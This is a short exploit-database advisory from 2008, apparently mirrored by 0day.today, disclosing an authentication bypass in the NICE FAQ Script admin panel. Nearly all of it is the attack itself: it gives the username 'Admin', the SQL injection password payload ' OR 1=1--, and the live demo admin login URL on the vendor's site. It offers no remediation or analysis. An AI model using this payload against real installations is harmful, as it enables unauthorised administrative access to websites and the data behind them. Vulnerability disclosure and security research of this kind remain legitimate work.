id: 4093
date: 11/06/2008
title: NICE FAQ Script (Auth Bypass) SQL Injection Vulnerability
author: r45c4l
cves: 

=========================================================
NICE FAQ Script (Auth Bypass) SQL Injection Vulnerability
=========================================================


################################################################ 
# 
# Title: NICE FAQ Script (Auth Bypass) SQl Injection Vulnerability
# 
# 
###########################################################
#
# Script Vendor: http://www.nicephpscripts.com/PHP-FAQ-Script-Knowledgebase-Script.htm
#
###########################################################
 
     Go To Admin Panel :

       Login With this information :

	Admin : Admin

	pass  : ' OR 1=1--


    Live Demo : 

	http://www.nicephpscripts.com/scripts/faqscript/admin/


###########################################################
#
#  Bug discovered : 06 Nov 2008
###########################################################



#  0day.today [2023-03-24]  #